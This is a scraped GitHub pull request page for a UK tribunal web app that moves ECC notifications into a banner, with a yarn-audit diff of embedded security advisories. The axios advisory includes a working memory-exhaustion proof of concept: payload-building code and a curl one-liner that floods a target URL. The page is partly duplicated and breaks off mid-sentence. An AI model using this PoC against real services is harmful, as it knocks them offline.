RET-5989 #2151

Mike-Brain · 2025-09-17T13:56:07Z

Before creating a pull request make sure that:

commit messages are meaningful and follow good commit message guidelines
tests have been updated / new tests has been added (if needed)

Please remove this line and everything above and fill the following sections:

JIRA link

https://tools.hmcts.net/jira/browse/RET-5989

Change description

ecc notifications to be displayed within a banner for users
removed redundant methods for ecc notifications filtering and display as they're now using the standard notification banner
updated unit tests

Does this PR introduce a breaking change? (check one with "x")

[ ] Yes
[x ] No

* ecc notifications to be displayed within a banner for users * removed redundant methods for ecc notifications filtering and display as they're now using the standard notification banner * updated unit tests

hsjhita

ECC changes look good but could we potentially fix the axios cve?
Update - spoke to Mike and Axios CVE to be fixed in master and merged into this branch when fixed

* update notification with document to call getDocumentsAdditionalInformation to show the document on the Tribunal Respond to Order

* created unit tests for getDocumentAdditionalInfo within TribunalRespondToOrderController

* updated unit tests

* don't show Rule92 text for ECC response banner * updated unit tests

* update banner text and translation

cindychmcts · 2025-09-24T12:49:40Z

yarn-audit-known-issues

@@ -1 +1 @@
-{"actions":[],"advisories":{"1105075":{"findings":[{"version":"3.5.2","paths":["@hmcts/nodejs-healthcheck>superagent>formidable"]}],"found_by":null,"deleted":null,"references":"- https://nvd.nist.gov/vuln/detail/CVE-2025-46653\n- https://github.com/node-formidable/formidable/commit/022c2c5577dfe14d2947f10909d81b03b6070bf5\n- https://github.com/node-formidable/formidable/blob/d0fbec13edc8add54a1afb9ce1a8d3db803f8d47/CHANGELOG.md?plain=1#L10\n- https://github.com/zast-ai/vulnerability-reports/blob/main/formidable/file_upload/report.md\n- https://github.com/node-formidable/formidable/commit/37a3e89fca1ed68ec674a539f13aafd62221ddaa\n- https://www.npmjs.com/package/formidable/v/2.1.3\n- https://www.npmjs.com/package/formidable/v/3.5.3\n- https://github.com/advisories/GHSA-75v8-2h7p-7m2m","created":"2025-04-26T21:31:26.000Z","id":1105075,"npm_advisory_id":null,"overview":"Formidable (aka node-formidable) 2.x before 2.1.3 and 3.x before 3.5.3 relies on hexoid to prevent guessing of filenames for untrusted executable content; however, hexoid is documented as not \"cryptographically secure.\" (Also, there is a scenario in which only the last two characters of a hexoid string need to be guessed, but this is not often relevant.) NOTE: this does not imply that, in a typical use case, attackers will be able to exploit any hexoid behavior to upload and execute their own content.","reported_by":null,"title":"Formidable relies on hexoid to prevent guessing of filenames for untrusted executable content","metadata":null,"cves":["CVE-2025-46653"],"access":"public","severity":"low","module_name":"formidable","vulnerable_versions":">=3.1.1-canary.20211030 <3.5.3","github_advisory_id":"GHSA-75v8-2h7p-7m2m","recommendation":"Upgrade to version 3.5.3 or later","patched_versions":">=3.5.3","updated":"2025-05-27T18:49:22.000Z","cvss":{"score":3.1,"vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-338"],"url":"https://github.com/advisories/GHSA-75v8-2h7p-7m2m"}},"muted":[],"metadata":{"vulnerabilities":{"info":0,"low":1,"moderate":0,"high":0,"critical":0},"dependencies":700,"devDependencies":0,"optionalDependencies":0,"totalDependencies":700}}
+{"actions":[],"advisories":{"1105075":{"findings":[{"version":"3.5.2","paths":["@hmcts/nodejs-healthcheck>superagent>formidable"]}],"found_by":null,"deleted":null,"references":"- https://nvd.nist.gov/vuln/detail/CVE-2025-46653\n- https://github.com/node-formidable/formidable/commit/022c2c5577dfe14d2947f10909d81b03b6070bf5\n- https://github.com/node-formidable/formidable/blob/d0fbec13edc8add54a1afb9ce1a8d3db803f8d47/CHANGELOG.md?plain=1#L10\n- https://github.com/zast-ai/vulnerability-reports/blob/main/formidable/file_upload/report.md\n- https://github.com/node-formidable/formidable/commit/37a3e89fca1ed68ec674a539f13aafd62221ddaa\n- https://www.npmjs.com/package/formidable/v/2.1.3\n- https://www.npmjs.com/package/formidable/v/3.5.3\n- https://github.com/advisories/GHSA-75v8-2h7p-7m2m","created":"2025-04-26T21:31:26.000Z","id":1105075,"npm_advisory_id":null,"overview":"Formidable (aka node-formidable) 2.x before 2.1.3 and 3.x before 3.5.3 relies on hexoid to prevent guessing of filenames for untrusted executable content; however, hexoid is documented as not \"cryptographically secure.\" (Also, there is a scenario in which only the last two characters of a hexoid string need to be guessed, but this is not often relevant.) NOTE: this does not imply that, in a typical use case, attackers will be able to exploit any hexoid behavior to upload and execute their own content.","reported_by":null,"title":"Formidable relies on hexoid to prevent guessing of filenames for untrusted executable content","metadata":null,"cves":["CVE-2025-46653"],"access":"public","severity":"low","module_name":"formidable","vulnerable_versions":">=3.1.1-canary.20211030 <3.5.3","github_advisory_id":"GHSA-75v8-2h7p-7m2m","recommendation":"Upgrade to version 3.5.3 or later","patched_versions":">=3.5.3","updated":"2025-05-27T18:49:22.000Z","cvss":{"score":3.1,"vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-338"],"url":"https://github.com/advisories/GHSA-75v8-2h7p-7m2m"},"1107370":{"findings":[{"version":"3.4.1","paths":["codeceptjs"]}],"found_by":null,"deleted":null,"references":"- https://nvd.nist.gov/vuln/detail/CVE-2025-57285\n- https://gist.github.com/Dremig/1ba111f9b1f7cffe1fcb4838b64e55b9\n- https://www.npmjs.com\n- https://github.com/advisories/GHSA-34w8-mcwr-vg29","created":"2025-09-08T18:31:42.000Z","id":1107370,"npm_advisory_id":null,"overview":"CodeceptJS 3.7.3 contains a command injection vulnerability in the emptyFolder function (lib/utils.js). The execSync command directly concatenates the user-controlled directoryPath parameter without sanitization or escaping, allowing attackers to execute arbitrary commands.","reported_by":null,"title":"CodeceptJS's incomprehensive sanitation can lead to Command Injection","metadata":null,"cves":["CVE-2025-57285"],"access":"public","severity":"critical","module_name":"codeceptjs","vulnerable_versions":"<=3.7.3","github_advisory_id":"GHSA-34w8-mcwr-vg29","recommendation":"None","patched_versions":"<0.0.0","updated":"2025-09-10T17:11:21.000Z","cvss":{"score":9.8,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},"cwe":["CWE-77"],"url":"https://github.com/advisories/GHSA-34w8-mcwr-vg29"},"1107599":{"findings":[{"version":"1.11.0","paths":["@pact-foundation/pact>axios"]}],"found_by":null,"deleted":null,"references":"- https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj\n- https://github.com/axios/axios/pull/7011\n- https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593\n- https://github.com/axios/axios/releases/tag/v1.12.0\n- https://nvd.nist.gov/vuln/detail/CVE-2025-58754\n- https://github.com/advisories/GHSA-4hjh-wcwx-xvwj","created":"2025-09-11T21:07:55.000Z","id":1107599,"npm_advisory_id":null,"overview":"## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === 'data:') {\n  let convertedData;\n  if (method !== 'GET') {\n    return settle(resolve, reject, { status: 405, ... });\n  }\n  convertedData = fromDataURI(config.url, responseType === 'blob', {\n    Blob: config.env && config.env.Blob\n  });\n  return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n  ...\n  if (protocol === 'data') {\n    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n    const match = DATA_URL_PATTERN.exec(uri);\n    ...\n    const body = match[3];\n    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');\n    if (asBlob) { return new _Blob([buffer], {type: mime}); }\n    return buffer;\n  }\n  throw new AxiosError('Unsupported protocol ' + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require('axios');\n\nasync function main() {\n  // this example decodes ~120 MB\n  const base64Size = 160_000_000; // 120 MB after decoding\n  const base64 = 'A'.repeat(base64Size);\n  const uri = 'data:application/octet-stream;base64,' + base64;\n\n  console.log('Generating URI with base64 length:', base64.length);\n  const response = await axios.get(uri, {\n    responseType: 'arraybuffer'\n  });\n\n  console.log('Received bytes:', response.data.length);\n}\n\nmain().catch(err => {\n  console.error('Error:', err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n<--- Last few GCs --->\n…\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x… node::Abort() …\n…\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n  timeout: 10000,\n  maxRedirects: 5,\n  httpAgent, httpsAgent,\n  headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n  validateStatus: c => c >= 200 && c < 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=>res.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"<http|https|data URL>\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) => {\n  const url = req.body?.url;\n  if (!url) return res.status(400).json({ error: \"missing url\" });\n\n  let u;\n  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n  // Developer allows using data:// in the allowlist\n  const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n  if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n  const controller = new AbortController();\n  const onClose = () => controller.abort();\n  res.on(\"close\", onClose);\n\n  const before = process.memoryUsage().heapUsed;\n\n  try {\n    const r = await axiosClient.get(u.toString(), {\n      responseType: \"stream\",\n      maxContentLength: 8 * 1024, // Axios will ignore this for data:\n      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:\n      signal: controller.signal\n    });\n\n    // stream only the first 64KB back\n    const cap = 64 * 1024;\n    let sent = 0;\n    const limiter = new PassThrough();\n    r.data.on(\"data\", (chunk) => {\n      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }\n      else { sent += chunk.length; limiter.write(chunk); }\n    });\n    r.data.on(\"end\", () => limiter.end());\n    r.data.on(\"error\", (e) => limiter.destroy(e));\n\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    limiter.pipe(res);\n  } catch (err) {\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    res.status(502).json({ error: String(err?.message || err) });\n  } finally {\n    res.off(\"close\", onClose);\n  }\n});\n\napp.listen(PORT, () => {\n  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))' \\\n| tee payload.json >/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n   For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n   Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.","reported_by":null,"title":"Axios is vulnerable to DoS attack through lack of data size check","metadata":null,"cves":["CVE-2025-58754"],"access":"public","severity":"high","module_name":"axios","vulnerable_versions":"<1.12.0","github_advisory_id":"GHSA-4hjh-wcwx-xvwj","recommendation":"Upgrade to version 1.12.0 or later","patched_versions":">=1.12.0","updated":"2025-09-15T14:19:46.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-770"],"url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj"}},"muted":[],"metadata":{"vulnerabilities":{"info":0,"low":1,"moderate":0,"high":1,"critical":1},"dependencies":699,"devDependencies":0,"optionalDependencies":0,"totalDependencies":699}}


Suggest moving the CVE suppression to a separate PR

RET-5989

8575eea

* ecc notifications to be displayed within a banner for users * removed redundant methods for ecc notifications filtering and display as they're now using the standard notification banner * updated unit tests

Mike-Brain added the enable_keep_helm label Sep 17, 2025

RET-5989

5d9242a

hmcts-jenkins-d-to-i bot deployed to preview September 17, 2025 14:25 View deployment

hmcts-jenkins-d-to-i bot added ns:et prd:et rel:et-sya-pr-2151 labels Sep 17, 2025

hsjhita previously approved these changes Sep 18, 2025

View reviewed changes

btensay previously approved these changes Sep 18, 2025

View reviewed changes

RET-5989

3730b1b

* update notification with document to call getDocumentsAdditionalInformation to show the document on the Tribunal Respond to Order

Mike-Brain dismissed stale reviews from btensay and hsjhita via 3730b1b September 22, 2025 15:06

hmcts-jenkins-d-to-i bot deployed to preview September 22, 2025 15:16 View deployment

Mike-Brain added 2 commits September 22, 2025 16:28

RET-5989

8434d8d

* created unit tests for getDocumentAdditionalInfo within TribunalRespondToOrderController

RET-5989

9d464af

* updated unit tests

hmcts-jenkins-d-to-i bot deployed to preview September 22, 2025 16:22 View deployment

RET-5989

259b95a

* don't show Rule92 text for ECC response banner * updated unit tests

hmcts-jenkins-d-to-i bot deployed to preview September 23, 2025 11:59 View deployment

RET-5989

4747506

* update banner text and translation

hmcts-jenkins-d-to-i bot deployed to preview September 23, 2025 13:11 View deployment

cindychmcts reviewed Sep 24, 2025

View reviewed changes

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

RET-5989 #2151

RET-5989 #2151

Uh oh!

Mike-Brain commented Sep 17, 2025 •

edited

Loading

Uh oh!

hsjhita left a comment •

edited

Loading

Uh oh!

cindychmcts Sep 24, 2025

Uh oh!

Uh oh!

		@@ -1 +1 @@
		{"actions":[],"advisories":{"1105075":{"findings":[{"version":"3.5.2","paths":["@hmcts/nodejs-healthcheck>superagent>formidable"]}],"found_by":null,"deleted":null,"references":"- https://nvd.nist.gov/vuln/detail/CVE-2025-46653\n- https://github.com/node-formidable/formidable/commit/022c2c5577dfe14d2947f10909d81b03b6070bf5\n- https://github.com/node-formidable/formidable/blob/d0fbec13edc8add54a1afb9ce1a8d3db803f8d47/CHANGELOG.md?plain=1#L10\n- https://github.com/zast-ai/vulnerability-reports/blob/main/formidable/file_upload/report.md\n- https://github.com/node-formidable/formidable/commit/37a3e89fca1ed68ec674a539f13aafd62221ddaa\n- https://www.npmjs.com/package/formidable/v/2.1.3\n- https://www.npmjs.com/package/formidable/v/3.5.3\n- https://github.com/advisories/GHSA-75v8-2h7p-7m2m","created":"2025-04-26T21:31:26.000Z","id":1105075,"npm_advisory_id":null,"overview":"Formidable (aka node-formidable) 2.x before 2.1.3 and 3.x before 3.5.3 relies on hexoid to prevent guessing of filenames for untrusted executable content; however, hexoid is documented as not \"cryptographically secure.\" (Also, there is a scenario in which only the last two characters of a hexoid string need to be guessed, but this is not often relevant.) NOTE: this does not imply that, in a typical use case, attackers will be able to exploit any hexoid behavior to upload and execute their own content.","reported_by":null,"title":"Formidable relies on hexoid to prevent guessing of filenames for untrusted executable content","metadata":null,"cves":["CVE-2025-46653"],"access":"public","severity":"low","module_name":"formidable","vulnerable_versions":">=3.1.1-canary.20211030 <3.5.3","github_advisory_id":"GHSA-75v8-2h7p-7m2m","recommendation":"Upgrade to version 3.5.3 or later","patched_versions":">=3.5.3","updated":"2025-05-27T18:49:22.000Z","cvss":{"score":3.1,"vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-338"],"url":"https://github.com/advisories/GHSA-75v8-2h7p-7m2m"}},"muted":[],"metadata":{"vulnerabilities":{"info":0,"low":1,"moderate":0,"high":0,"critical":0},"dependencies":700,"devDependencies":0,"optionalDependencies":0,"totalDependencies":700}}
		{"actions":[],"advisories":{"1105075":{"findings":[{"version":"3.5.2","paths":["@hmcts/nodejs-healthcheck>superagent>formidable"]}],"found_by":null,"deleted":null,"references":"- https://nvd.nist.gov/vuln/detail/CVE-2025-46653\n- https://github.com/node-formidable/formidable/commit/022c2c5577dfe14d2947f10909d81b03b6070bf5\n- https://github.com/node-formidable/formidable/blob/d0fbec13edc8add54a1afb9ce1a8d3db803f8d47/CHANGELOG.md?plain=1#L10\n- https://github.com/zast-ai/vulnerability-reports/blob/main/formidable/file_upload/report.md\n- https://github.com/node-formidable/formidable/commit/37a3e89fca1ed68ec674a539f13aafd62221ddaa\n- https://www.npmjs.com/package/formidable/v/2.1.3\n- https://www.npmjs.com/package/formidable/v/3.5.3\n- https://github.com/advisories/GHSA-75v8-2h7p-7m2m","created":"2025-04-26T21:31:26.000Z","id":1105075,"npm_advisory_id":null,"overview":"Formidable (aka node-formidable) 2.x before 2.1.3 and 3.x before 3.5.3 relies on hexoid to prevent guessing of filenames for untrusted executable content; however, hexoid is documented as not \"cryptographically secure.\" (Also, there is a scenario in which only the last two characters of a hexoid string need to be guessed, but this is not often relevant.) NOTE: this does not imply that, in a typical use case, attackers will be able to exploit any hexoid behavior to upload and execute their own content.","reported_by":null,"title":"Formidable relies on hexoid to prevent guessing of filenames for untrusted executable content","metadata":null,"cves":["CVE-2025-46653"],"access":"public","severity":"low","module_name":"formidable","vulnerable_versions":">=3.1.1-canary.20211030 <3.5.3","github_advisory_id":"GHSA-75v8-2h7p-7m2m","recommendation":"Upgrade to version 3.5.3 or later","patched_versions":">=3.5.3","updated":"2025-05-27T18:49:22.000Z","cvss":{"score":3.1,"vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-338"],"url":"https://github.com/advisories/GHSA-75v8-2h7p-7m2m"},"1107370":{"findings":[{"version":"3.4.1","paths":["codeceptjs"]}],"found_by":null,"deleted":null,"references":"- https://nvd.nist.gov/vuln/detail/CVE-2025-57285\n- https://gist.github.com/Dremig/1ba111f9b1f7cffe1fcb4838b64e55b9\n- https://www.npmjs.com\n- https://github.com/advisories/GHSA-34w8-mcwr-vg29","created":"2025-09-08T18:31:42.000Z","id":1107370,"npm_advisory_id":null,"overview":"CodeceptJS 3.7.3 contains a command injection vulnerability in the emptyFolder function (lib/utils.js). The execSync command directly concatenates the user-controlled directoryPath parameter without sanitization or escaping, allowing attackers to execute arbitrary commands.","reported_by":null,"title":"CodeceptJS's incomprehensive sanitation can lead to Command Injection","metadata":null,"cves":["CVE-2025-57285"],"access":"public","severity":"critical","module_name":"codeceptjs","vulnerable_versions":"<=3.7.3","github_advisory_id":"GHSA-34w8-mcwr-vg29","recommendation":"None","patched_versions":"<0.0.0","updated":"2025-09-10T17:11:21.000Z","cvss":{"score":9.8,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},"cwe":["CWE-77"],"url":"https://github.com/advisories/GHSA-34w8-mcwr-vg29"},"1107599":{"findings":[{"version":"1.11.0","paths":["@pact-foundation/pact>axios"]}],"found_by":null,"deleted":null,"references":"- https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj\n- https://github.com/axios/axios/pull/7011\n- https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593\n- https://github.com/axios/axios/releases/tag/v1.12.0\n- https://nvd.nist.gov/vuln/detail/CVE-2025-58754\n- https://github.com/advisories/GHSA-4hjh-wcwx-xvwj","created":"2025-09-11T21:07:55.000Z","id":1107599,"npm_advisory_id":null,"overview":"## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol \|\| supportedProtocols[0];\n\nif (protocol === 'data:') {\n let convertedData;\n if (method !== 'GET') {\n return settle(resolve, reject, { status: 405, ... });\n }\n convertedData = fromDataURI(config.url, responseType === 'blob', {\n Blob: config.env && config.env.Blob\n });\n return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n ...\n if (protocol === 'data') {\n uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n const match = DATA_URL_PATTERN.exec(uri);\n ...\n const body = match[3];\n const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');\n if (asBlob) { return new _Blob([buffer], {type: mime}); }\n return buffer;\n }\n throw new AxiosError('Unsupported protocol ' + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does not honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require('axios');\n\nasync function main() {\n // this example decodes ~120 MB\n const base64Size = 160_000_000; // 120 MB after decoding\n const base64 = 'A'.repeat(base64Size);\n const uri = 'data:application/octet-stream;base64,' + base64;\n\n console.log('Generating URI with base64 length:', base64.length);\n const response = await axios.get(uri, {\n responseType: 'arraybuffer'\n });\n\n console.log('Received bytes:', response.data.length);\n}\n\nmain().catch(err => {\n console.error('Error:', err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n<--- Last few GCs --->\n…\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x… node::Abort() …\n…\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n timeout: 10000,\n maxRedirects: 5,\n httpAgent, httpsAgent,\n headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n validateStatus: c => c >= 200 && c < 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT \|\| 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY \|\| \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=>res.send(\"ok\"));\n\n/*\n POST /preview { \"url\": \"<http\|https\|data URL>\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n /\n\napp.post(\"/preview\", async (req, res) => {\n const url = req.body?.url;\n if (!url) return res.status(400).json({ error: \"missing url\" });\n\n let u;\n try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n // Developer allows using data:// in the allowlist\n const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n const controller = new AbortController();\n const onClose = () => controller.abort();\n res.on(\"close\", onClose);\n\n const before = process.memoryUsage().heapUsed;\n\n try {\n const r = await axiosClient.get(u.toString(), {\n responseType: \"stream\",\n maxContentLength: 8 1024, // Axios will ignore this for data:\n maxBodyLength: 8 * 1024, // Axios will ignore this for data:\n signal: controller.signal\n });\n\n // stream only the first 64KB back\n const cap = 64 * 1024;\n let sent = 0;\n const limiter = new PassThrough();\n r.data.on(\"data\", (chunk) => {\n if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }\n else { sent += chunk.length; limiter.write(chunk); }\n });\n r.data.on(\"end\", () => limiter.end());\n r.data.on(\"error\", (e) => limiter.destroy(e));\n\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n limiter.pipe(res);\n } catch (err) {\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n res.status(502).json({ error: String(err?.message \|\| err) });\n } finally {\n res.off(\"close\", onClose);\n }\n});\n\napp.listen(PORT, () => {\n console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e 'const n=+process.env.SIZE_MB10241024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))' \\\n\| tee payload.json >/dev/null\nseq 1 3 \| xargs -P3 -I{} curl -sS -X POST \"$URL\" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. Enforce size limits\n For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. Stream decoding\n Instead of decoding the entire payload in one `Buffer.from` call, 